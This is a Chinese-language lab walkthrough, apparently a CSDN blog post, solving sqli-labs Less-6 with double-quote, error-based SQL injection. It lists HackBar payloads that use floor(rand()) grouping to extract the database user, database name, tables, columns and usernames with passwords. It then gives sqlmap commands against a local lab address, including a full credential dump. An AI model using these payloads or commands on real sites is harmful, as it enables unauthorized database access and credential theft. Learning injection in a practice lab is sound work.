HackBar
观察页面
注入id=1
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FSqF1x4q-1667376381131)(assets/image-20221102155048-fultn6o.png)]](https://i-blog.csdnimg.cn/blog_migrate/f1ca15c791ea7269ca8eddf277ff78aa.png)
有正常的回显
判断注入点
注入id=1’
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1ZAnE5Mq-1667376381133)(assets/image-20221102155152-h00idzw.png)]](https://i-blog.csdnimg.cn/blog_migrate/e61a830a709eebb1801fe56fba2838db.png)
正常回显了,说明跟单引号的闭合没有关系
注入id=1"
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MCup8HpZ-1667376381133)(assets/image-20221102155300-uehj1ea.png)]](https://i-blog.csdnimg.cn/blog_migrate/c7add6f468ab2d07f3f523b03112d1be.png)
报错了,查看报错的信息,发现这个注入点跟双引号的闭合有关系
判断字段数
?id=1" order by 4 --+
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jb8Fth6P-1667376381134)(assets/image-20221102155435-hdk4ydp.png)]](https://i-blog.csdnimg.cn/blog_migrate/741cd3ab2d92f218525e91d87018c82d.png)
说明字段数为3
爆数据库用户
?id=-1" union select 1,count(*),concat((select user()),floor(rand()*9))as a from information_schema.tables group by a--+
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XJqBYQYi-1667376381135)(assets/image-20221102155527-g7k2m7k.png)]](https://i-blog.csdnimg.cn/blog_migrate/62fdf5b9eb6650acb938794b20f648d2.png)
爆数据库名
?id=1" union select count(*),2,concat('*',(select database()),'*',floor(rand()*2))as a from information_schema.tables group by a--+
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WGVLndOF-1667376381136)(assets/image-20221102155629-oygfw8q.png)]](https://i-blog.csdnimg.cn/blog_migrate/5f544cce4fa1c25c8218bb6cd114b312.png)
爆数据库的数据表
?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*9))as a from information_schema.tables group by a--+
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Z94VFFk8-1667376381137)(assets/image-20221102155730-v6cyye2.png)]](https://i-blog.csdnimg.cn/blog_migrate/c21006d12a6be76e130a708bae780792.png)
爆数据库的数据表中的列名
?id=-1" union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qbljKr3y-1667376381138)(assets/image-20221102155843-blwhvsp.png)]](https://i-blog.csdnimg.cn/blog_migrate/019fb2ba37d755b6d7944c8ae24116e4.png)
ps:如果出现了正常回显,可能是还没有将信息注入,多按Execute就可以了
爆数据库的数据表中的字段名
?id=-1" union select count(*),1, concat('~',(select concat_ws('[',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NSW5TJRO-1667376381139)(assets/image-20221102160004-cfwxmwv.png)]](https://i-blog.csdnimg.cn/blog_migrate/116b02ecfe069aa36f5cbd041d696dd0.png)
sqlmap
sqlmap -u "http://0.0.0.0:8088/Less-6//?id=1" -batch
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WcY2DWAA-1667376381139)(assets/image-20221102160123-jhn8n0h.png)]](https://i-blog.csdnimg.cn/blog_migrate/3c02534751aecb7b4db5029e3ec20ef0.png)
爆数据库名
sqlmap -u "http://0.0.0.0:8088/Less-6//?id=1" -batch -dbs
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BwcU7xY1-1667376381140)(assets/image-20221102160241-j7rb53n.png)]](https://i-blog.csdnimg.cn/blog_migrate/dc4442cd18aa018577e839fe688718dd.png)
爆数据表的字段
sqlmap -u "http://0.0.0.0:8088/Less-6//?id=1" -batch -T users --columns
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IX9t8Uiw-1667376381140)(assets/image-20221102160314-basfdw8.png)]](https://i-blog.csdnimg.cn/blog_migrate/d1b9064cecd9344d619da6f2988e5d66.png)
爆数据库的所有内容
sqlmap -u "http://0.0.0.0:8088/Less-6//?id=1" -batch -D security -T users -C username,password -dump
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CcQjGYtY-1667376381141)(assets/image-20221102160459-ry3l9vv.png)]](https://i-blog.csdnimg.cn/blog_migrate/e2e2e7498f27bfa3fd6490aaa32be23c.png)
928
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
